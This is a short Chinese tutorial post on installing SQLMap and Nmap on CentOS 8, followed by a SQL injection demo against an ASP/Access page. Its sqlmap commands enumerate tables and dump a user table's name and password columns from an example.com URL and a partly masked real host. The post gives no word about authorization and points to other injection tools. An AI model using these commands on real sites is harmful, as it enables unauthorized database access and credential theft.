code前端网Centos 8安装SQLMap、Nmap和Access数据库简单注入 SQLMap
SQLMap是一款非常强大的渗透测试工具,代码开源。支持的数据库:MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite 等。等待
第一步,安装Python环境:yum install python -y
第二步,SQLMap的安装比较简单,只需下载源码,安装到指定目录/usr/local/即可,下载命令:
git clone https://github.com/sqlmapproject/sqlmap.git
第三步,安装Nmap,下载编译安装
git clone https://github.com/nmap/nmap.git cd nmap ./configure make && make install make clean
sqlmap注入简短演示:
注入漏洞地址:http://www.example.com/showannounce.asp? id=104
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" [在 Kali 中使用:sqlmap -u "http://jgkd.xxx.com /announceshow.asp ?id=203"】
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --tables
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --columns -T user
./sqlmap.py -u "http://www.example.com/showannounce. asp?id= 104" --dump -T user -C "name,psw"
中间会提示输入一个线程。像这样输入大约 5 到 10 个线程。上面的user和psw看情况,可以灵活应用。
还有,如果你不会Kali或者没有Linux环境,你可以使用D、明小子、Pangolin等工具来打开它,前提是你的字典足够强大!
版权声明
本文仅代表作者观点,不代表Code前端网立场。
本文系作者Code前端网发表,如需转载,请注明页面地址。
